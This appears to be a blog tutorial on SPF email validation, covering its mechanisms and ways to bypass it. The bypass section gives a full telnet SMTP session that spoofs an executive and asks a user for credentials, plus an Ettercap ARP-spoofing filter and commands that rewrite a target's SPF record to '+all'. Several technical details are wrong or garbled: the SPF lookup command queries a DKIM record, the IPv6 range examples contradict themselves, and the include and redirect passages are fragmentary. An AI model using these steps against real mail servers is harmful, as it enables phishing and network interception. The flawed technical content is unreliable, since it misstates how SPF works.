Introduction
Quick overview of SPF email validation protocol (Examples, Vulnerabilities).
SPF (Sender Policy Framework) is here to hardens your DNS servers and restricts who can send emails with your domain name.
The Sender Framework Policy preovides a list of IP addresses that are authorized to send email on behalf of the domain. It’s specifying a technical method to prevent sender address forgery. This IP/Domain list is stored in the DNS records of the domain TXT record. Email providers that have SPF will lookup DNS records of the domain from where the email is claiming to be. It will compare that info with the originating IP address/email. If checks match, email will pass. If they don’t, email might be marked as spam, or rejected. SPF only checks the “From” part of the email.
Check domain SPF:
nslookup -type=txt <selector>._domainkey.<domain>
SPF Qualifiers (Actions)
We can use any mechanism with any of the four qualifiers:
- + for a
PASS: allow all mail. This can be omitted; e.g., +mx is the same as mx - ? for a
NEUTRAL: all emails are accepted (e.g. ?all – no policy statement) - ~ (tilde) for
SOFTFAIL: emails are accepted / shown for the user, but marked with a warning as suspicious/spam (e.g. ~all – Allow mail whether or not it matches the parameters) - – (minus) for
HARDFAIL: all emails that are suspected to be forged or spam are rejected and not delivered (e.g. -all – allow only mail that matches one of the parameters)
SPF Mechanisms
>> all: Always matches. Usually set at the end.
"v=spf1 mx -all": Allow domain’s MXes to send mail for the domain, prohibit all others"v=spf1 -all": The domain sends no mail at all."v=spf1 +all": The domain owner thinks that SPF is useless and/or doesn’t care.
>> ipv4: An IPv4 network range. The /32 is default if there is no CIDR is set. For ipv6, argument to the ip6 mechanism is an IPv6 network range. If set without netmask, it defaults to /128.
"v=spf1 ip4:192.168.0.1/16 -all": Allow any IP address between 192.168.0.1 and 192.168.255.255."v=spf1 ip6:1080::8:900:200C:417A/96 -all": Enable any IPv6 address between 1080::8:900:0000:0000 and 1080::8:800:FFFF:FFFF."v=spf1 ip6:1080::8:900:68.0.3.1/96 -all": Allow any IPv6 address between 1080::8:900:0000:0000 and 1080::8:800:FFFF:FFFF.
>> a: All A records from a domain are tested. If the client IP is found among them it’s match. For connections made over IPv6 an AAAA lookup is performed instead. If domain is not set, current domain is used.
"v=spf1 a -all": The current domain is used."v=spf1 a:example.com -all": Equivalent if the current domain is example.com."v=spf1 a:mail.example.com -all": Perhaps example.com has chosen to explicitly list all the outbound mailers in a special A record under mx.example.com."v=spf1 a/24 a:sub.example.com/24 -all": If example.com resolves to 192.0.3.2, the entire class C of 192.0.3.0/24 would be searched for the client IP. Similarly for sub.example.com. If more than one A record were returned, each one would be expanded to a CIDR subnet.
>> mx: All of the A records for all the MX records for domain are tested in order of MX priority. If the client IP is found among them, it’s a match. If there is no domain, we’re using current domain. The A records have to match the client IP exactly, unless a sufix-length is provided, in which case each IP address returned by the A lookup will be expanded to its corresponding CIDR prefix, and the client IP will be searched within that subnet.
"v=spf1 mx mx:deferrals.domain.com -all": Perhaps a domain sends mail through its MX servers plus another set of servers whose job is to retry mail for deferring domains."v=spf1 mx/24 mx:offsite.domain.com/24 -all": Perhaps a domain’s MX servers receive mail on one IP address, but send mail on a different but nearby IP address.
>> ptr: The hostname or hostnames for the client IP are looked up using PTR queries. The hostnames are then validated: at least one of the A records for a PTR hostname must match the original client IP. Invalid hostnames are discarded. If a valid hostname ends in domain, this mechanism matches, otherwise we’re relying on current domain.
"v=spf1 ptr -all": A domain which directly controls all its machines (unlike a dialup or broadband ISP) allows all its servers to send mail. For example, hotmail.com or paypal.com might do this."v=spf1 ptr:otherdomain.com -all": Any server whose hostname ends in otherdomain.com is designated.
>> exists: Perform an A query on the provided domain. If a result is found, it’s a match. It doesn’t matter what the lookup result is – it could be 127.0.0.2.
"v=spf1 exists:example.com -all": If example.com does not resolve, the result is fail. If it does resolve, this mechanism results in a match.
"v=spf1 include:example.com -all"
-all“, the include as a whole fails to match; the eventual result is still Fail from the outer directive set in this example.SPF Modifiers
Following example: The client IP is 1.2.3.4 and the current domain is example.com.
"v=spf1 redirect=example.com"
Vulnerability (ByPass/Get Around SPF)
SPF email validation protocol alone isn’t actually very helpful for protecting your domain from abuse. The biggest problem is that SPF bases its authentication decisions on a message header field that most humans never see, the Return-Path. That makes it way too easy for hackers to create messages that look legitimate but are fraudulent (because they are using someone else’s domain in the From field).
Simple Example (Office 365)
# telnet <mail server> 25 EHLO domainX.com 250-ESMTP Server Ready MAIL FROM: <evil@domainX.com> 250 +OK Sender OK RCPT TO: <target_user@target_domain.com> SIZE=43251 250 +OK Recipient OK DATA 354 Start mail input, end with '<CR><LF>.<CR><LF>' FROM: "Jack the CFO" <jack@target_domain.com> TO: "target_user" <user@target_domain.com> SUBJECT Important request Please send me your user credentials, I forgot mine. P.S. Don't tell anyone. Thanks .
Mail envelope part. It’s there to “mislead” SPF (bypass verification test)Mail header. It’s there to mislead the end recipient.Mail envelope that includes information about the sender identity (stored in the MAIL FROM field). Before it’s removed, that value is moved/copied to RETURN-PATH field. That field is present in case message could not be delivered to recipient. In that case server will use that address to send NDR message back to the sender.Ronald Reagan Attack (Gmail’s SPF bypass)
There are two fields in the email header that play a role here:
X-Sender-Id: Field that Gmail uses in its SPF-check and that is used for spear phishing and impersonation analysisFrom: Field that is actually presented to the Gmail user
X-Sender-Id : This is the real sender (spoofed). Most important part of the attack, well aligned with the server that sent the email.(2) Reply To : This header field (FROM) is presented to the recipient, but the actual reply goes to email specified in “Return-Path” (previous example shows how this gets filled). “Reply To” is also spoofed: uses the impersonated victim name in a domain that doesn’t exist
(3,4) Authentication-Results, Received-SPF and Arc-Authentication-Results: These are the fields that indicate the receiver’s (Gmail) calculated authenticity of the email. Note that in all tests, the email address from the X-Sender-ID is selected as the identity to test with (As indicated in the X-Auth-Id field) and that all tests pass successfully – the email is ‘authentic’
(5) Return-Path: This field is what the mail server would use if the end-user chooses to reply to sender. The “Reply to” filed user see is spoofed, and the reply will be correctly routed to the attacker via “Return-Path” field.
(6) From: The email address of the impersonated sender (Spoofed).
ARP Spoofing (Behind enemy lines)
Address Resolution Protocol (ARP) is a protocol for mapping an IP address to a physical machine address (MAC – Media Access Control) that is recognized in the local network. ARP table/cache is used to maintain a correlation between MAC (Layer 2 address) and corresponding IP address (Layer 3 address). Re-check network layers (OSI Model) if you’re not familiar with them. With ARP Spoofing we’re broadcasting fake ARP information. The goal is to force DNS traffic to go through our computer (as a gateway), so we can alter traffic that goes through.
With this achieved, we can now use some tool (for instance Ettercap) to modify DNS response to fit our needs: telling the receiving mail server that any IP can send emails for a targeted <DOMAIN> (SPF=+all), resulting in a VALID SPF check. With Ettercap we can specify a filter (modifying the traffic):
if (ip.proto==UDP &amp;&amp; udp.src==53 &amp;&amp; search(DATA.data, "v=spf1 mx -all")) {
replace("v=spf1 mx -all", "v=spf1 mx +all");
msg("Mail Server Opened!");
}
Compile it using Etterfilter:
etterfilter myfilter.filter –o myfilter.ef
set the attack in place with the Ettercap:
ettercap –TqM arp:remote –F myfilter.ef /192.168.1.10-15/ /192.168.1.33/
With message “Mail Server Opened!”, go ahead and try to send an email via Telnet.
Conclusion
That’s it for now on SPF email validation protocol (Examples, Vulnerabilities). We’ll update/expand article later as we continue to cover related subject. Remember, the fact that you advertise an SPF record in no way obliges anyone else to honour it. It is up to the admins of any given mail server what email they choose to accept. So, don’t panic if some admin complains that your domain is sending them spam and you have the SPF record. They’re probably not checking SPF records. World is overflowing with lamers.
Check “Telnet Email Address Validation” for some examples on MX communication/responses, or DKIM for further improvements.
To work on:
- Read RFC4408: Sender Policy Framework (SPF) for Authorizing Use of Domains in E-Mail, Version 1
- Read RFC6652: Sender Policy Framework (SPF) Authentication Failure Reporting Using the Abuse Reporting Format
- Read RFC7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1 (update)
- Read RFC7372: Email Authentication Status Codes
